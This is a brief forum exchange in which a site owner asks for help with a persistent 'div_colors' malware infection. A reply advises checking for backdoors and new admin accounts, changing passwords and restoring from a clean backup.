I scan all code using Site Monitor & add security patch, still can't fix it.
Any suugestion?

Yes, that the "div_colors" malware that is affecting lots of sites. As Taipo very well said in the other thread, it is hard to fix it (doable),
but you can't just remove the malware that is present (visible), you also have to search for backdoors, new admin users, secure your site and change all passwords
to make sure they can't come back in. Upgrading from a hacked site it also a pain and you may still leave backdoors in there, so not 100% as well.

The best option is always to revert back to a clean backup, and then secure the site from there...
